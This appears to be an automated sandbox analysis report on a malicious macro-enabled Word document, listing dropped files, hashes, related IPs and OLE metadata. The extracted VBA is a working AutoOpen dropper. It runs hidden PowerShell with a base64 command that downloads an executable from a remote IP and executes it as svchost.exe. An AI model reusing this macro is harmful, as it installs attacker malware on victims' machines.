        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        ALEXHOSTMDsupport.Client.exe.zipGet hashmaliciousScreenConnect ToolBrowse
        • 176.123.10.70
        https://coanj.com/Get hashmaliciousUnknownBrowse
        • 45.142.212.163
        Q1a9z2AS7p.elfGet hashmaliciousUnknownBrowse
        • 176.123.1.127
        3sbAd2pTKO.elfGet hashmaliciousUnknownBrowse
        • 176.123.1.127
        5SgnZcDoHg.elfGet hashmaliciousUnknownBrowse
        • 176.123.1.127
        uKzd18tKZ2.elfGet hashmaliciousUnknownBrowse
        • 176.123.1.127
        9r8dnbGVit.elfGet hashmaliciousUnknownBrowse
        • 176.123.1.127
        Aklr8oRy7s.elfGet hashmaliciousMiraiBrowse
        • 176.123.1.127
        a1IUAX8aGK.elfGet hashmaliciousUnknownBrowse
        • 176.123.1.127
        2Zg5TXmcsz.elfGet hashmaliciousUnknownBrowse
        • 176.123.1.127

        JA3 Fingerprints

        No context

        Dropped Files

        No context

        Created / dropped Files

        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

        Download File
        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        File Type:data
        Category:dropped
        Size (bytes):4742
        Entropy (8bit):4.8105940880640246
        Encrypted:false
        SSDEEP:96:mCJ2Woe5Sgyg12jDs+un/iQLEYFjDaeWJ6KGcmXuFRLcU6/KI2k6Lm5emmXIG:Jxoe5+gkjDt4iWN3yBGH+dcU6CIVsm5D
        MD5:278C40A9A3B321CA9147FFBC6BE3A8A8
        SHA1:D795FC7D3249F9D924DC951DA1DB900D02496D73
        SHA-256:4EB0EAE13C3C67789AD8940555F31548A66F5031BF1A804E26EA6E303515259E
        SHA-512:E7222B41A436CE0BF8FA3D8E5EB8249D4D3985419D0F901F535375789F001B5929EF9B85C1D6802F0FBD5F722A52CB27021F87D076E69D92F46C7C3E894C6F00
        Malicious:false
        Reputation:low
        Preview:PSMODULECACHE.....8.......S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script............7...q...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psd1m.......Remove-Variable........Convert-String........Trace-Command........Sort-Object........Register-Object

        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Download File
        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        File Type:data
        Category:dropped
        Size (bytes):64
        Entropy (8bit):0.34726597513537405
        Encrypted:false
        SSDEEP:3:Nlll:Nll
        MD5:446DD1CF97EABA21CF14D03AEBC79F27
        SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
        SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
        SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
        Malicious:false
        Reputation:high, very likely benign file
        Preview:@...e...........................................................

        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\AA9CA9A9.jpeg

        Download File
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1144x1704, components 3
        Category:dropped
        Size (bytes):90841
        Entropy (8bit):7.106301701970938
        Encrypted:false
        SSDEEP:1536:1uLaHmmF7tG8Q/qk8fowr/5mUpKNEteuEC5/ThAoLCAJZSfxV:MLIt7tD/rRmCK6guEC5/ThAQSfxV
        MD5:17968648DD7404DC108135E6C110D486
        SHA1:764A94B573835FC2E281B8F6E5BBB28BC987F0B0
        SHA-256:8F43CB1BE6106FA2EF22BC8303A1B67AAB332346FF7E0A47C3B0757B8379FA68
        SHA-512:11183DC048932A14431CE0AEC645DD9B5097F36258DF1324CDE012BF935B6C58CB7B1412217538CE5371786D6778971087FCCFABFDFE9499CD39C17502AD3D94
        Malicious:false
        Reputation:low
        Preview:......JFIF.....`.`.....C....................................................................C.........................................................................x.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..N._*.K..V......"..=......J....^Sc.%...k.%.....Q.....$.*..$.P.W%.).o../o..w\..$RP.}....|u...R.l.@.....5..j.y...^lt..,.UE...]Z.H...RJ.....G\...{.$T....*H.......2y........QM..u..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE.2I.b..zU}J_*:..uI"..;H.|....#.*%.o.@....I.....?...g..:......mpR.......E....|.<..

        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{91706ACD-1867-4224-BC67-02D7D9560855}.tmp

        Download File
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:Composite Document File V2 Document, Cannot read section info
        Category:dropped
        Size (bytes):20992
        Entropy (8bit):4.416521988282859
        Encrypted:false
        SSDEEP:192:yuDtF+YM7f5C6Pn6zihyV50jOXamtF+NM7f5C6Pn6zihyV50jOXa:jtMz7f5fh450j6tMO7f5fh450j
        MD5:1CC18D7233B2C280BD1757067C74D1B0
        SHA1:D3505976725317643CC264828D055F22E99A13CE
        SHA-256:F7E03F128F8F5957CC7BD46283A6701903D033BCF0BA9D88DD6104DFE74151CC
        SHA-512:A5D653E6E9D6BE0003F68D7D5BB1ECF0404E96275FE1CB3E471FF0629388BAF6698ACA1F4BD88C9F82F9C6BC685B6851CABAE14387B95349AA02EBCF283759BA
        Malicious:false
        Reputation:low
        Preview:......................>...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................&............................... ...!..."...#...$...%.......'...............................................................................................................................................................................................................................................................................................................................................

        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{89AD645A-9CDB-46AF-ADC6-EB1F41B38A0D}.tmp

        Download File
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:data
        Category:dropped
        Size (bytes):1024
        Entropy (8bit):0.05390218305374581
        Encrypted:false
        SSDEEP:3:ol3lYdn:4Wn
        MD5:5D4D94EE7E06BBB0AF9584119797B23A
        SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
        SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
        SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
        Malicious:false
        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{8CFC7664-ECC5-401B-BC4B-1A11E537F9D3}.tmp

        Download File
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:data
        Category:dropped
        Size (bytes):1536
        Entropy (8bit):0.14296898889373857
        Encrypted:false
        SSDEEP:3:llYkkn/lPbKO+:ruV+
        MD5:F01927180D610C0437A5237A7CE292A7
        SHA1:EDA2A9619863C803A873C7692A99615DBE37E3D5
        SHA-256:3C08324AC1396335F485CFD5CA7B3942FFAF769CEC57FE37537EAFFE30AB06D4
        SHA-512:82689DAF2F731120F336ECF0CF71EC6AE43DE9037B2B4987A6F5D136F733FB151E79F417EB025ECBEF5CC64E99B4C0D1A5617D5596EC040C608D3B98190DD763
        Malicious:false
        Preview:../.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{F14F8F4B-9EDC-4627-9A33-B44C25639533}.tmp

        Download File
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:data
        Category:dropped
        Size (bytes):2
        Entropy (8bit):1.0
        Encrypted:false
        SSDEEP:3:X:X
        MD5:32649384730B2D61C9E79D46DE589115
        SHA1:053D8D6CEEBA9453C97D0EE5374DB863E6F77AD4
        SHA-256:E545D395BB3FD971F91BF9A2B6722831DF704EFAE6C1AA9DA0989ED0970B77BB
        SHA-512:A4944ADFCB670ECD1A320FF126E7DBC7FC8CC4D5E73696D43C404E1C9BB5F228CF8A6EC1E9B1820709AD6D4D28093B7020B1B2578FDBC764287F86F888C07D9C
        Malicious:false
        Preview:..

        C:\Users\user\AppData\Local\Temp\4stycn1f.n4h.psm1

        Download File
        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        File Type:very short file (no magic)
        Category:dropped
        Size (bytes):1
        Entropy (8bit):0.0
        Encrypted:false
        SSDEEP:3:U:U
        MD5:C4CA4238A0B923820DCC509A6F75849B
        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
        Malicious:false
        Preview:1

        C:\Users\user\AppData\Local\Temp\hnebbegh.qjg.ps1

        Download File
        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        File Type:very short file (no magic)
        Category:dropped
        Size (bytes):1
        Entropy (8bit):0.0
        Encrypted:false
        SSDEEP:3:U:U
        MD5:C4CA4238A0B923820DCC509A6F75849B
        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
        Malicious:false
        Preview:1

        C:\Users\user\AppData\Local\Temp\svchost.exe

        Download File
        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
        Category:dropped
        Size (bytes):184320
        Entropy (8bit):5.854304013941445
        Encrypted:false
        SSDEEP:1536:DBk7z1TJEKLoBPuST/yC+ef27OClD2ZR6LaXQ1C9Hu1v3QN5tlQDeJqXHqGcyhoM:DuST/ym27DC8EYau1P45wY
        MD5:92C57DD80B764A028749520017D44E76
        SHA1:F732220ADAACF23DE6CC69D964341766D2E350D9
        SHA-256:DBD741A45D840D06D708339F9E9824F2A0D745EA6537CA44BFF233BA7441BFDA
        SHA-512:DD7D363FEF5750A256ABC2AE43D17F8E4788D392AFAA74A2085F34DA05EFEB12373F38FBF480E1C86EB2759C667C971C7C54512F5D59EE61F5A0A4341AC406C8
        Malicious:true
        Antivirus:
        • Antivirus: Avira, Detection: 100%
        • Antivirus: ReversingLabs, Detection: 92%
        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........$Bl.E,?.E,?.E,?V..?.E,?...?.E,?...?.E,?...?.E,?.W?.E,?.E-?.E,?...?.E,?...?.E,?...?.E,?Rich.E,?........................PE..L.....Jd.....................,....................@..................................$..........................................P...................................................................................................................text............................... ..`.rdata..fj.......l..................@..@.data...\...........................@....rsrc..............................@..@........................................................................................................................................................................................................................................................................................................................................................

        C:\Users\user\AppData\Local\Temp\t52pnbyr.1tt.ps1

        Download File
        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        File Type:very short file (no magic)
        Category:dropped
        Size (bytes):1
        Entropy (8bit):0.0
        Encrypted:false
        SSDEEP:3:U:U
        MD5:C4CA4238A0B923820DCC509A6F75849B
        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
        Malicious:false
        Preview:1

        C:\Users\user\AppData\Local\Temp\zop144zf.jnz.psm1

        Download File
        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        File Type:very short file (no magic)
        Category:dropped
        Size (bytes):1
        Entropy (8bit):0.0
        Encrypted:false
        SSDEEP:3:U:U
        MD5:C4CA4238A0B923820DCC509A6F75849B
        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
        Malicious:false
        Preview:1

        C:\Users\user\AppData\Local\Temp\~DFF8D2936508DC487F.TMP

        Download File
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:Composite Document File V2 Document, Cannot read section info
        Category:dropped
        Size (bytes):30720
        Entropy (8bit):4.104344375944342
        Encrypted:false
        SSDEEP:384:ia6Y2BOAgmf5+Y7vg/heU7eAm50jUtKtsVzvlpzJop0ZG:0B+yvIqYtKvlpzJWz
        MD5:27B09AFDACE3E0955812682FB68DF4AC
        SHA1:10D3DDA12BAE6616618E06315D30604E43D883AF
        SHA-256:3FF6D489F4DF2CB71F50AE0CD10046915876942E740304971E97816132FA3ADD
        SHA-512:1E7DFC95B29F71E16B4FFBC70617CA5D9DABBEAC49E93D7BA7A8CDA87CFE57AB2162121B984AE34341E10D9E962B14D9BDBF66439DFAB9EFF7E16717F8BB299B
        Malicious:true
        Antivirus:
        • Antivirus: Joe Sandbox ML, Detection: 100%
        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................'...................$............................................................................................... ...!..."...#...%...0...&...(.......)...*...+...,.../...........1...............4...5...6...7...8...9...:...-...............................................................................................................................................................................................................................................................

        C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\ 472.rtf.LNK

        Download File
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:03 2023, mtime=Fri Aug 11 15:42:03 2023, atime=Thu May 23 17:15:02 2024, length=74014, window=hide
        Category:dropped
        Size (bytes):1004
        Entropy (8bit):4.530894897623714
        Encrypted:false
        SSDEEP:12:8vYTRgXg/XAlCPCHaXZgzBpB/J89rX+W55ClNtOpicvbQCgA5DtZ3YilMMEpxRlw:8C/XTWzPc9/5ChbeMCDDv3q/k7N
        MD5:E59CC46735C9C7E403DE8E7184465910
        SHA1:83D54EF6C696DA236403B52C3DE51BA6EB0BCA60
        SHA-256:B7CB287C9A017A9CF5B18EB2AF399111715F7C47623F248245494A86CCA281C9
        SHA-512:EBBA36683E06B8644B839F4174713349A0D77941920AD622F559240A5C6C1B051AD5BA7EA46A7BFFABA57CBDCBDABB51EA15B1F0981116D25C51E6178348A64B
        Malicious:false
        Preview:L..................F.... .......r.......r....m.!=....!...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......X...user.8......QK.X.X.*...&=....U...............A.l.b.u.s.....z.1......WC...Desktop.d......QK.X.WC.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....b.2..!...X. .472RTF~1.DOC..F.......WB..WB.*......................... .4.7.2...r.t.f...d.o.c.......v...............-...8...[............?J......C:\Users\..#...................\\888683\Users.user\Desktop\ 472.rtf.doc.#.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\. .4.7.2...r.t.f...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......888683..........D_....3N...W...9.W.e8...8.....[D_....3N...W...9.W.e8...8.....[

        C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

        Download File
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:Generic INItialization configuration [folders]
        Category:dropped
        Size (bytes):48
        Entropy (8bit):4.345175521464346
        Encrypted:false
        SSDEEP:3:M1RkL1LprFom481LprFov:M+13j13y
        MD5:FC7E7B191658D448C680E0096885A0B6
        SHA1:ECDE37FAEB5970DB4813F16072F47519BCC60435
        SHA-256:D1736879B63539683995BFF240858134EC0B374C5A11F34EF43D49008A7268DE
        SHA-512:C24CC93F4D70F37DB5F50F022519BBE025D25EC45FE014901188DE772DB2B4D532F79F5F808CBAFB70F95F6FFE51622E471FB4E1C1C54D36C90C029D1E11EF4A
        Malicious:false
        Preview:[doc]..472.rtf.LNK=0..[folders]..472.rtf.LNK=0..

        C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

        Download File
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:data
        Category:dropped
        Size (bytes):162
        Entropy (8bit):2.4797606462020307
        Encrypted:false
        SSDEEP:3:vrJlaCkWtVyHlqlzl0pbklMWjV4lc+/dllln:vdsCkWtWYlz21kF2JV/l
        MD5:2CF7D3B8DED3F1D5CE1AC92F3E51D4ED
        SHA1:95E13378EA9CACA068B2687F01E9EF13F56627C2
        SHA-256:60DF94CDE4FD9B4A73BB13775079D75CE954B75DED5A2878277FA64AD767CAB1
        SHA-512:2D5797FBBE44766D93A5DE3D92911358C70D8BE60D5DF542ECEDB77D1195DC1EEF85E4CA1445595BE81550335A20AB3F11B512385FE20F75B1E269D6AB048E0A
        Malicious:false
        Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

        C:\Users\user\Desktop\~$72.rtf.doc

        Download File
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:data
        Category:dropped
        Size (bytes):162
        Entropy (8bit):2.4797606462020307
        Encrypted:false
        SSDEEP:3:vrJlaCkWtVyHlqlzl0pbklMWjV4lc+/dllln:vdsCkWtWYlz21kF2JV/l
        MD5:2CF7D3B8DED3F1D5CE1AC92F3E51D4ED
        SHA1:95E13378EA9CACA068B2687F01E9EF13F56627C2
        SHA-256:60DF94CDE4FD9B4A73BB13775079D75CE954B75DED5A2878277FA64AD767CAB1
        SHA-512:2D5797FBBE44766D93A5DE3D92911358C70D8BE60D5DF542ECEDB77D1195DC1EEF85E4CA1445595BE81550335A20AB3F11B512385FE20F75B1E269D6AB048E0A
        Malicious:false
        Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

        Static File Info

        General

        File type:Microsoft Word 2007+
        Entropy (8bit):7.205070030523837
        TrID:
        • Word Microsoft Office Open XML Format document with Macro (52004/1) 37.96%
        • Word Microsoft Office Open XML Format document (49504/1) 36.13%
        • Word Microsoft Office Open XML Format document (27504/1) 20.07%
        • ZIP compressed archive (8000/1) 5.84%
        File name: 472.rtf.doc
        File size:108'643 bytes
        MD5:0bd1328012301d04bdc921acb321b820
        SHA1:724612a3c88f187aa000efe4ff4e9e04c9553696
        SHA256:7be9ef61632edc0f2fc6ad59d64ad69dbffbd05013a80ab1dfbb6bd8a6090b66
        SHA512:d588760ba4fb450a41563849ec10da311ef317c80da1e816b5d88198aef35379fd15f63512620fa7514f7d46f719afc07bce5fff7690ae6336e5a7d747e7d22f
        SSDEEP:1536:FCuLaHmmF7tG8Q/qk8fowr/5mUpKNEteuEC5/ThAoLCAJZSfx6BrqbyGfh:hLIt7tD/rRmCK6guEC5/ThAQSfxSuGQ
        TLSH:48B349138C0C9B87E02D47F9BE071D9E7A6A475CED8279FE00521ECB7E412524D8A96F
        File Content Preview:PK..........!...e.....^.......[Content_Types].xml ...(.........................................................................................................................................................................................................

        File Icon

        Icon Hash:2764a3aaaeb7bdbf

        Static OLE Info

        General

        Document Type:OpenXML
        Number of OLE Files:1

        OLE File " 472.rtf.doc"

        Indicators
        Has Summary Info:
        Application Name:
        Encrypted Document:False
        Contains Word Document Stream:True
        Contains Workbook/Book Stream:False
        Contains PowerPoint Document Stream:False
        Contains Visio Document Stream:False
        Contains ObjectPool Stream:False
        Flash Objects Count:0
        Contains VBA Macros:True
        Summary
        Author:wolf
        Template:Normal.dotm
        Last Saved By:wolf
        Revion Number:3
        Total Edit Time:1
        Create Time:2024-05-23T00:18:00Z
        Last Saved Time:2024-05-23T00:22:00Z
        Number of Pages:1
        Number of Words:0
        Number of Characters:1
        Creating Application:Microsoft Office Word
        Security:0
        Document Summary
        Number of Lines:1
        Number of Paragraphs:1
        Thumbnail Scaling Desired:false
        Company:
        Contains Dirty Links:false
        Shared Document:false
        Changed Hyperlinks:false
        Application Version:16.0000

        Streams with VBA

        VBA File Name: NewMacros.bas, Stream Size: 2099
        General
        Stream Path:VBA/NewMacros
        VBA File Name:NewMacros.bas
        Stream Size:2099
        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . . < . . . . . . . < . . . . . . . < . . . . . . . < . . . . . . . . . . . . . . . . . . . . . . . . . . . .
        Data Raw:01 16 03 00 00 f0 00 00 00 12 03 00 00 d4 00 00 00 b0 01 00 00 ff ff ff ff 19 03 00 00 e5 05 00 00 00 00 00 00 01 00 00 00 b7 f8 f3 88 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
        VBA Code
        Attribute VB_Name = "NewMacros"
Sub AutoOpen()
    Application.ScreenUpdating = False
    Dim Program As Integer
    Dim cmdStr As String
    cmdStr = "cmd /c timeout 3 && Powershell -C $B = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('JFdlYiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ICRVcmwgPSAnaHR0cDovLzQ1Ljg0LjAuMTczL2Rvd25sb2FkXzIyL3NlcnZlci5leGUnOyAkUHRoID0gIiRlbnY6VGVtcFxzdmNob3N0LmV4ZSI7ICRXZWIuRG93bmxvYWRGaWxlKCRVcmwsICRQdGgpOyBJbnZva2UtRXhwcmVzc2lvbiAkUHRoOw==')); $C = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($B)); powershell -E $C;"
    Program = Shell(cmdStr, vbHide)
    Application.ScreenUpdating = True
End Sub

        VBA File Name: ThisDocument.cls, Stream Size: 938
        General
        Stream Path:VBA/ThisDocument
        VBA File Name:ThisDocument.cls
        Stream Size:938
        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S " . . . . S . . . . . S " . . . . . < . . . . . . . . . . ( . 1 . N . o . r . m . a . l . . . T . h . i . s .
        Data Raw:01 16 03 00 00 f0 00 00 00 ac 02 00 00 d4 00 00 00 da 01 00 00 ff ff ff ff b3 02 00 00 07 03 00 00 00 00 00 00 01 00 00 00 b7 f8 2a 92 00 00 ff ff a3 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
        VBA Code
        Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

        Streams

        Stream Path: PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 419
        General
        Stream Path:PROJECT
        CLSID:
        File Type:ASCII text, with CRLF line terminators
        Stream Size:419
        Entropy:5.3793990619995125
        Base64 Encoded:True
        Data ASCII:I D = " { 7 F 4 D 6 A 6 6 - 1 9 0 E - 4 8 F 7 - 9 1 8 1 - E B C D 5 6 C B F 3 E 9 } " . . D o c u m e n t = T h i s D o c u m e n t / & H 0 0 0 0 0 0 0 0 . . M o d u l e = N e w M a c r o s . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 6 A 6 8 7 E 1 6 E C 1 A E C 1 A E C 1 A E C 1 A " . . D P B = " D 4 D 6 C 0 8 0 4 0 E B 4 1 E B 4 1 E B " . . G C = " 3 E 3 C 2 A 3 A F E C E 6 9 C F 6 9 C F 9 6 " . . . .
        Data Raw:49 44 3d 22 7b 37 46 34 44 36 41 36 36 2d 31 39 30 45 2d 34 38 46 37 2d 39 31 38 31 2d 45 42 43 44 35 36 43 42 46 33 45 39 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 44 6f 63 75 6d 65 6e 74 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 4e 65 77 4d 61 63 72 6f 73 0d 0a 4e 61 6d 65 3d 22 50 72 6f 6a 65 63 74 22 0d 0a 48 65 6c 70 43 6f 6e 74 65 78 74 49 44 3d 22
        Stream Path: PROJECTwm, File Type: data, Stream Size: 71
        General
        Stream Path:PROJECTwm
        CLSID:
        File Type:data
        Stream Size:71
        Entropy:3.3485999524807437
        Base64 Encoded:False
        Data ASCII:T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . N e w M a c r o s . N . e . w . M . a . c . r . o . s . . . . .
        Data Raw:54 68 69 73 44 6f 63 75 6d 65 6e 74 00 54 00 68 00 69 00 73 00 44 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 00 00 4e 65 77 4d 61 63 72 6f 73 00 4e 00 65 00 77 00 4d 00 61 00 63 00 72 00 6f 00 73 00 00 00 00 00
        Stream Path: VBA/_VBA_PROJECT, File Type: data, Stream Size: 2637
        General
        Stream Path:VBA/_VBA_PROJECT
        CLSID:
        File Type:data
        Stream Size:2637
        Entropy:4.087205229304595
        Base64 Encoded:False
        Data ASCII:a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 . . . D .
        Data Raw:cc 61 b5 00 00 03 00 ff 00 0c 00 00 09 04 00 00 e3 04 03 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 20 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
        Stream Path: VBA/dir, File Type: data, Stream Size: 568
        General
        Stream Path:VBA/dir
        CLSID:
        File Type:data
        Stream Size:568
        Entropy:6.316541798842935
        Base64 Encoded:True
